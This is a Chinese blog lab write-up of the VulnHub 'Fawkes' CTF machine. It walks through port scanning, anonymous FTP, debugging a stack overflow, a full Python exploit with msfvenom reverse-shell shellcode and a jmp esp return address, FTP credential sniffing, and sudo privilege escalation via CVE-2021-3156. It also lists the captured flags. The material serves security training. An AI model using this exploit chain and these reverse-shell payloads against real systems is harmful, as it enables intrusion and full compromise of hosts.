【渗透测试】第七周 vulnhub-Fawkes

最新推荐文章于 2023-06-08 11:29:15 发布
最新推荐文章于 2023-06-08 11:29:15 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: 渗透学习笔记 文章标签: 网络 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ke_DiWZ/article/details/127727342
版权

headimg

网络攻防实战 第七次实验

邮箱:keekkewy@qq.com

2022年11月2日

靶机连接:https://vulnhub.com/entry/harrypotter-fawkes,686/

一、实验目的

取得目标靶机的root权限并获得三个 flag。

我们将使用到以下攻击手段:

  • 主机发现、端口扫描
  • FTP匿名登录
  • edb 调试程序
  • 栈溢出攻击
  • tcpdump 流量分析
  • sudo 漏洞提权

二、实验内容

kali: 10.0.2.15

靶机: 10.0.2.11

0x00. 准备工作

  1. 获取靶机 IP 并扫描其开放的端口以及个端口上对应的服务:

    $ sudo arp-scan -I eth0 -l
$ sudo nmap -p- 10.0.2.11
$ sudo nmap -p21,22,80,2222,9898 -sV 10.0.2.11 -A
    扫描其开放的端口以及个端口上对应的服务

    发现两个比较特殊的端口:

    21 - ftp 服务并允许匿名登录获取文件 server_hogwarts

    9898 - 一个自定义的服务。

  2. 访问80端口并查看网页源码,发现只有一张图片,并没有其他有价值的信息:

    访问80端口 查看网页源码

0x01. FTP 匿名登录

  1. 查看我们端口扫描获取的信息:

    端口扫描获取的信息

    说明该 FTP 服务可以使用用户名 Anonymous 无密码登入并可以查看文件 server_hogwarts

  2. 通过 FTP 登入靶机并使用 get 指令下载上述文件:

    $ ftp 10.0.2.11
ftp> get server_hogwarts
    使用 get 指令下载上述文件

  3. 查看文件类型,发现是一个 ELF 可执行文件:

    $ file server_hogwarts
    查看文件类型

  4. 给予执行权限,尝试执行:

    给予执行权限,尝试执行

    发现什么都没有输出,但是 shell 阻塞住了并没有退出,说明该程序确实启动了。

  5. 查看后台进程:

    $ ps -aux | grep server		# 显示名字包含server的所有进程
    查看后台进程

    发现该程序确实创建了后台进程。

  6. 查看该进程的连接信息:

    $ ss -pantu | grep server_hogwarts
    查看该进程的连接信息

    发现该进程运行在9898端口上,联想到靶机9898端口上的自定义服务,推测该程序即为靶机9898端口上所运行的服务。

  7. 使用 nc 命令监听该端口:

    使用nc命令监听该端口

    发现我们可以进行输入,推测存在栈溢出攻击。

0x02. 栈溢出攻击

  1. 使用 checksec 工具查看该文件开启了哪些保护机制:

    安装:$ apt install checksec

    $ file server_hogwarts
    查看该文件开启了哪些保护机制
    • STACK CANARY:在初始化堆栈时在栈底插入一个随机生成的 cookie,在函数返回前调用 __stack_chk_fail 检查 cookie 有没有发生变化,若发生变化则不返回,而直接终止程序。由于缓冲区溢出攻击时往往会覆盖掉 cookie 的值,故该保护机制开启时会导致常规的溢出攻击失效,程序会直接终止而不是跳转至攻击者注入的目标地址。
    • NX:开启时栈中数据没有执行权限,即攻击者不能通过缓冲区溢出注入攻击代码;
    • PIE:编译时将程序编译为位置无关, 即程序运行时各个段(如代码段等)加载的虚拟地址也是在装载时才确定,使程序的内存布局难以预料。

    参考:checksec

    NXPIE 关闭,我们可以尝试注入反弹 shell 的代码并使其被执行,从而获取反弹 shell。

    STACK CANARY 被开启了,意味着注入时我们也许要针对其进行某种绕过,先不管它。

  2. 将 kali 本机上的 ALSR 安全机制关闭,该技术会导致地址空间随机化,不便于调试:

    # echo 0 > /proc/sys/kernel/randomize_va_space

  3. 使用 edb 对当前程序进行调试,探测注入点:

    安装:$ apt install edb-debugger

    $ sudo edb

    点击 File-> Attach

    查看该文件开启了哪些保护机制 image-20221102131334120

    选择目标进程:

    image-20221102131449821

    点击运行:

    image-20221102131645942

    使用 python 生成500个“A”,并在监听窗口进行输入:

    $ python -c "print(500*'A')"
    image-20221102132043611

    触发报错且看到“0x41414141”,查看此时 EIP 寄存器的值:

    image-20221102132228938

    发现变成了 0x41414141,而 ‘0x41’ 为 ‘A’ 的十六进制编码,说明我们输入的字符成功覆盖了函数返回地址,导致程序发生了错误跳转。

    “诶?不是说这个程序开启了 STACK CANARY 保护机制,会对栈溢出做检查吗?为什么直接注入就成了?”

    重新执行上述操作,并重新监听9898端口。点击单步调试:

    image-20221102133244528

    同样输入500个A, 回到 edb 继续追踪,直到触发错误,记录此时的指令地址:

    image-20221102134114851

    发现在追踪的过程中没有调用 __stack_chk_fail 函数检查 cookie 的正确性。通过 objdump 查看其反汇编代码进一步确认,发现原来 __stack_chk_fail 只在一部分函数返回前被调用了,而在注入点所在的函数中未被调用,因此我们可以正常进行注入。

    image-20221102134746962 image-20221102134658874

    综上,Canary found 仅代表程序中存在检查机制,而不一定在所有的ret 语句前都做了检查。在进行渗透测试时应先尝试注入,不要被一些未验证的细节限制了思路。

  4. 使用 msf-pattern 工具进行溢出点在输入字符串中位置的探测:

    $ msf-pattern_create -l 500		# 生成长度为500的模式字符串
    image-20221102140948014

    重新程序并重新开始调试,将生成的模式字符串作为输入:

    image-20221102141044293

    提示我们此时 EIP 中的值为 0x64413764,即我们输入的字符串中编码为“\x64\x41\x37\x64”的字串进入了 EIP 中。查找该段编码对应的字符串在模式字符串中的偏移量:

    $ msf-pattern_offset -l 500 -q 64413764
    image-20221102143036638

    也就是说从模式字符串中的第113个字符串开始造成了栈溢出。

  5. 使用 python 生成一段自定义字符串进行验证:

    $ python -c "print(112*'A' + 'BBBB' + 100*'C')"

    将生成的字符串输入后,查看 EIP 和栈中的值:

    image-20221102145117162

    发现第113、114、115、116个字符(“BBBB”)恰好进入 EIP,而其后的字符保留在栈中。

    设想将反弹 shell 代码注入栈中,而使程序跳转到栈中执行(jmp esp),即可令靶机上的程序执行反弹 shell 代码生成反弹 shell。

  6. 寻找原程序中的 jmp esp 指令,打开 edbOpcode Search

    image-20221102150253164

    选择一个可执行段,然后选择搜索 ESP -> EIP

    image-20221102150439846

    找到 jmp esp 指令并记录其地址(0x08049d55):

    image-20221102150528530

  7. 构造注入字符串:

    $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -b "\x00" -f py
    • LHOST:改为 kali 的 IP;
    • LPORT:改为监听反弹 shell 的端口号;
    • -b "\x00":过滤坏字符(‘\0’),避免输入提前终止。
    image-20221102151042228

  8. 编写注入脚本:

    import struct, socket

buf =  b""
buf += b"\xd9\xec\xbe\xe7\x1d\x4c\x47\xd9\x74\x24\xf4\x5f"
buf += b"\x29\xc9\xb1\x12\x31\x77\x17\x03\x77\x17\x83\x08"
buf += b"\xe1\xae\xb2\xe7\xc1\xd8\xde\x54\xb5\x75\x4b\x58"
buf += b"\xb0\x9b\x3b\x3a\x0f\xdb\xaf\x9b\x3f\xe3\x02\x9b"
buf += b"\x09\x65\x64\xf3\x83\x95\x94\x0c\xfc\x97\x98\x03"
buf += b"\xa0\x1e\x79\x93\x3e\x71\x2b\x80\x0d\x72\x42\xc7"
buf += b"\xbf\xf5\x06\x6f\x2e\xd9\xd5\x07\xc6\x0a\x35\xb5"
buf += b"\x7f\xdc\xaa\x6b\xd3\x57\xcd\x3b\xd8\xaa\x8e"

payload = 112 * b'A' + struct.pack('I',0x08049d55) + 32 * b'\x90' + buf

s=socket.socket()
s.connect(('10.0.2.11',9898))
s.send((payload))
s.close()

    关于上述脚本,我们在栈溢出跳转地址和攻击代码之间加入了一长串空指令 nop\x90)。至于为什么一定要加上这一段,我们先看看运行注入代码时发生了什么。

    在本地调试时,上述脚本中 connect 的 IP 参数要更改为 127.0.0.1

    程序成功跳转到 jmp esp 指令时,观察栈中数据,发现从 08049d55 (我们注入的 jmp esp 指令地址)之后紧接着就是我们加入的32个 \x90

    image-20221102160339385

    接着往下看,当程序运行到 fnstenv [esp - 0xc] 指令时,栈中数据发生了变化,部分空指令被新数据覆盖:

    image-20221102160608834

    注入代码中存在指令修改了栈顶数据,若不加空指令,我们的注入代码本身就处于栈顶,则会在执行过程中将自身的代码覆盖掉。添加空指令之后,EIP 会沿着空指令一直增长到真正的注入代码,而 ESP 不变,使 EIP 与 ESP 拉开一定的距离,一定程度上保证注入在栈中的代码不会被修改。

    在注入时加入一段空指令可以提高程序稳定性,一般加入的空指令数为4的倍数

  9. 监听 4444 端口,执行上述脚本,获取反弹 shell:

    image-20221102163819732

0x03. 信息收集

  1. 发现当前用户的主目录下存在隐藏文件:

    image-20221102164827048

    查看该文件内容:

    HarrYp0tter@Hogwarts123

    image-20221102165848456

    疑似某个密码,联想此前靶机上开放的 ssh 端口,尝试通过 ssh 登录靶机。

  2. 首先通过22端口登录,发现登录失败;转而通过2222端口登录,发现登录成功:

    image-20221102170759008

  3. 查看用户权限:

    $ sudo -l
    image-20221102170906423

    发现当前用户可以不使用密码通过 sudo 执行所有命令。

  4. 使用 sudo -i 指令直接提权,并发现 root 账号主目录下存在两个文件:

    image-20221102171235709

  5. 查看当前环境 IP:

    image-20221102171442911

    根据 lab2 的经验,我们进入的可能是一个 docker 容器而非靶机本身。

  6. 查看此前发现的两个文件:

    • horcrux1.txt: horcrux_{NjogSGFSclkgUG90VGVyIGRFc1RyT3llZCBieSB2b2xEZU1vclQ=}

    • note.txt:

      Hello Admin!!

      We have found that someone is trying to login to our ftp server by mistake.You are requested to analyze the traffic and figure out the user.

    第一个文件为我们发现的第一个 Flag,第二个文件为一些提示,提示我们需要监听靶机 FTP 服务的流量,即靶机21端口的流量。

0x04. tcpdump 流量分析

  1. 使用 tcpdump 命令监听靶机21端口:

    $ tcpdump -i eth0 port 21
    image-20221102172625767

  2. 等待片刻后发现输出了一些流量记录:

    image-20221102173440633

    发现其握手信息中包含用户名和密码。

    • USER:neville
    • PASS:bL!Bsg3k

  3. 尝试使用上述用户名和密码通过靶机的22端口登入靶机:

    image-20221102173809386

    成功登录后,通过 IP 信息发现此时环境为真正的靶机。

  4. 查看当前路径下的文件,获取第二个 Flag:

    • horcrux2.txt: horcrux_{NzogTmFHaU5pIHRIZSBTbkFrZSBkZVN0cm9ZZWQgQnkgTmVWaWxsZSBMb25HYm9UVG9t}
    image-20221102174006923

0x05. sudo 漏洞提权

  1. 查看内核与 sudo 版本信息:

    image-20221102174336959

  2. 上网搜索相关的漏洞信息,最终发现针对当前版本 sudo 的一个漏洞及其利用代码:

    CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)

    利用代码:https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py

    image-20221102182310949

    将此处 sudo 的路径更改为靶机上 sudo 的路径:

    image-20221102182406991

  3. 在 kali 上开启 web 应用,将该文件上传至靶机运行:

    image-20221102182723675

    成功提权!

  4. 前往靶机的 /root/ 路径,发现第三个 Flag:

    image-20221102182855456

三、实验结果

  • Flag1: horcrux_{NjogSGFSclkgUG90VGVyIGRFc1RyT3llZCBieSB2b2xEZU1vclQ=}

  • Flag2: horcrux_{NzogTmFHaU5pIHRIZSBTbkFrZSBkZVN0cm9ZZWQgQnkgTmVWaWxsZSBMb25HYm9UVG9t}

  • Flag3:

    image-20221102182855456

  • root 权限:

    image-20221102182723675

四、总结

  • 从端口服务信息中得知靶机 FTP 服务允许匿名登录,尝试匿名登录,通过 get 指令下载文件server_hogwarts,发现是一个可执行文件;
  • 试运行该程序,推测该程序与靶机 9898 端口所运行服务的程序相同;
  • 使用 edb 对该程序进行调试,发现栈溢出攻击注入点,并编写注入脚本,向靶机 9898 端口服务注入反弹 shell 代码;
  • 成功获取反弹 shell,在当前用户主目录的隐藏文件中发现可用于 ssh 登录的密码;
  • 使用 ssh 通过靶机 2222端口登录后,发现位于一个容器中,且当前用户可以直接使用 sudo -i 进行提权。在当前容器 root 用户的主目录中发现第一个 Flag;
  • 使用 tcpdump 监听容器 21 端口的流量,发现 FTP 的握手过程包含了用户名和密码,猜测可以用来通过 ssh 登入靶机。尝试后成功通过22端口进入靶机;
  • 在靶机当前用户的主目录下发现第二个 Flag;
  • 查看发行版本以及 sudo 版本,上网查找相关漏洞,最终找到可用的漏洞利用代码。简单修改后,从 kali 上传靶机,在靶机执行后成功获取 root 权限。
  • 在靶机 root 用户的主目录下,发现最后一个 Flag。

从端口服务信息中得知靶机 FTP 服务允许匿名登录,尝试匿名登录,通过 get 指令下载文件server_hogwarts,发现是一个可执行文件;

  • 试运行该程序,推测该程序与靶机 9898 端口所运行服务的程序相同;
  • 使用 edb 对该程序进行调试,发现栈溢出攻击注入点,并编写注入脚本,向靶机 9898 端口服务注入反弹 shell 代码;
  • 成功获取反弹 shell,在当前用户主目录的隐藏文件中发现可用于 ssh 登录的密码;
  • 使用 ssh 通过靶机 2222端口登录后,发现位于一个容器中,且当前用户可以直接使用 sudo -i 进行提权。在当前容器 root 用户的主目录中发现第一个 Flag;
  • 使用 tcpdump 监听容器 21 端口的流量,发现 FTP 的握手过程包含了用户名和密码,猜测可以用来通过 ssh 登入靶机。尝试后成功通过22端口进入靶机;
  • 在靶机当前用户的主目录下发现第二个 Flag;
  • 查看发行版本以及 sudo 版本,上网查找相关漏洞,最终找到可用的漏洞利用代码。简单修改后,从 kali 上传靶机,在靶机执行后成功获取 root 权限。
  • 在靶机 root 用户的主目录下,发现最后一个 Flag。
可弟WZ
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fawkes-master.rar.rar.rar
02-02
fawkes-master.rar.rar.rar
fawkes:Fawkes是用于搜索易受SQL注入攻击的目标的工具。 使用Google搜索引擎执行搜索
02-04
Fawkes是用于搜索易受SQL注入攻击的目标的工具。 使用Google搜索引擎执行搜索。 选件 -q, --query - Dork that will be used in the search engine. -r, --results - Number of results brought by the search ...
Fawkes(vulnhub)
wcl20010的博客
05-29 1088
HarryPotter: Fawkes ~ VulnHub 此靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
vulnhub之HARRYPOTTER: FAWKES
weixin_54431413的博客
05-26 740
对发现的程序用edb-debugger进行调试,发现缓冲区溢出漏洞,找偏移量确定位置,注入payload,打点成功,信息收集,发现账号密码,通过ssh登录,tcpdump分析流量,成功跳出容器。最后利用堆缓冲区溢出提权成功。
VulnHub靶场】——HARRYPOTTER第三部: FAWKES
Demo不是emo的博客
10-14 4654
这是哈利波特vm系列靶场的第三个靶场,总共有三个靶场,其中隐藏了8个魂器,前两部的靶场中我们已经找到了隐藏的5个魂器,今天这个靶场中隐藏了三个,意思就是今天的靶场有三个flag,话不多说我们来仔细瞧瞧
vulnhub靶场,covfefe
kukudeshuo的博客
08-17 502
vulnhub靶场,covfefe 环境准备 靶机下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 攻击机:kali(192.168.109.128) 靶机:covfefe(192.168.109.161) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.161 使用nmap扫描查看目标靶机端口开放情况
【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
weixin_45742777的博客
07-19 5102
【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
fawkes:etch获取,解析,分类,汇总用户评论:rocket::rocket:
04-22
Fawkes是为产品经理和产品开发团队设计的平台,可从客户角度综合了解产品的运行状况,了解客户正在谈论的主要问题,他们的情感以及他们的感受关于产品。建筑学特征 :rocket: 与多个数据源集成 :high_voltage: ...
Fawkes,针对面部识别系统的隐私保护工具-Python开发
05-25
Fawkes是由芝加哥大学SANDLab研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请参阅我们的项目网页。 Fawkes Fawkes是由芝加哥大学SANDLab的研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请...
fawkes:Fawkes,针对面部识别系统的隐私保护工具。 有关更多信息,请访问https://sandlab.cs.uchicago.edufawkes
02-21
Fawkes是由芝加哥大学研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请参阅我们的项目。 通过与我们联系。 我们在USENIX Security 2020上发表了一篇学术论文,总结了我们的工作“”。版权此代码仅用于...
【MSFconsole进阶】Nops(空指令模块):作用、使用方法
05-25 1560
【渗透工具】MSFconsole进阶:Nops(空指令模块)
Fawkes 靶机之 缓冲区溢出、漏洞利用代码编写等利用
qq_40898302的博客
04-28 368
主机发现 端口扫描 WEB信息收集 FTP服务攻击 缓冲区溢出 模糊测试 漏洞利用代码编写 流量转包分析 堆溢出漏洞攻击 Metasploit(MSF) 手动修复EXP代码 本地提权
Fawkes靶机打靶过程及思路
qq_52610024的博客
05-08 1029
payload=‘A’*112+‘B’*4+‘\x90’*32+‘C’*32加x90是空指令,是为了程序的执行更加的顺滑。2.80端口没有得到任何有用的信息,21端口ftp可以匿名登录,登录进之后发现一个可以下载的文件。,下载后保存到本机并运行程序,在本机进程里发现运行成功,最后本机上开放了9898端口,运行后。执行脚本发现成功精确写入四个B,尝试在eip中写入跳转到esp的汇编指令,在esp中执行一个。8.手动修改代码,将sudo路径修改为/usr/bin/sudo,再次在靶机上执行程序,...
Metasploit 渗透测试01-背景和功能介绍
煜铭2011
01-16 4215
0x00背景 渗透测试的定义:通过实际攻击进行安全测试与评估,Metasploit是一个免费的、可下载的渗透框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 黑盒测试(外部测试):设计模拟一个对客户组织一无所知的攻击者所进行的渗透攻击。优点:能更逼真地模拟一次真正的攻击过程;缺点:费时费力,渗透测试者需要具备较高的技术能力。 白盒测试(内部测试):渗透测试者拥有客户组织所有知识的情况下所进行的渗...
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4472
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
kali linux关闭栈保护机制,kali下栈溢出实验和一些tips
weixin_33279929的博客
05-15 710
首先我的实验环境和教程均来自http://staff.ustc.edu.cn/~sycheng/ssat/,我这里讲的是《栈溢出 & 整数溢出》这个课程的实验实验开始,首先你要准备好环境,我的操作系统是kali-linux-2017.1-i386然后你要安装Linux下pwn都会用到的工具:peda,安装方法是:git clone https://github.com/longld/ped...
[Kali]--栈缓冲区溢出
wwxxee
11-24 277
栈缓冲区溢出 内存数据分布图 Text:包含程序代码 Data:包含全局变量,静态变量,该段的大小在编译时计算 堆:存储动态变量,new动作会在堆上分配内存 栈:保存函数参数,局部变量,函数调用时栈空间消耗就会变大。 堆栈内存是运行时实时分配的 CPU通用寄存器 EIP:指令指针 ESP:栈指针(栈顶) EBP:基指针(栈底) ESI:源变址寄存器 EDI:目标变址寄存器 EAX:累加寄存器 EBX:基地址寄存器 ECX:计数寄存器 EDX:数据寄存器 与栈溢出有关的寄存器主要是ESP,EBP,E
HTB-hackthebox-RouterSpace
yutianovo的博客
07-17 1020
DataLevelMediumSummarize1、安卓渗透burp抓包测试接口2、写入ssh公钥登录主机3、命令限制传输curlwget使用SCP传输绕过4、httpsTags。
java.rmi.server.ExportException: Port already in use : 9898;
zd8582zd的专栏
02-26 4343
运行tomcat出现下面问题: 解决问题: 1.这个异常说明端口9898被其他进程占用了,查看占用进程的方法为: 1)命令行cmd -> netstat -ano,得到占用端口9898的pID 2)ctrl+alt+del,进入任务管理器,点击“查看‘,选择pid后,查看是那个进程占用的       解决方案: 端口被修改了!
Fawkes基本原理
最新发布
09-02
Fawkes是一种隐私保护工具,它的基本原理是使用虚拟化技术来保护用户的隐私。虚拟化是一种将物理实体转化为逻辑对应物的技术,它可以在一台物理机器上同时运行多个虚拟机。Fawkes利用虚拟化技术,在用户的设备上创建一个隐私保护的环境,将用户的数据和行为进行虚拟化处理,以保护用户的隐私。通过对数据和行为进行虚拟化处理,Fawkes可以防止潜在的隐私泄露风险,同时保护用户的个人信息、隐私偏好和行为数据不被滥用。Fawkes的基本原理是将用户的数据和行为虚拟化处理,从而保护用户的隐私。同时,Fawkes还采用了一些技术手段来保证写操作的顺利执行,例如设置了一个互斥信号量来保证写优先。这样可以保障在读文件源源不断的情况下,写操作能够正常进行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [从“健康码”到数字货币,我国金融科技正迈向新阶段](https://blog.csdn.net/Digquant/article/details/115549849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [2020-08-30](https://blog.csdn.net/Fawkess/article/details/108312214)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值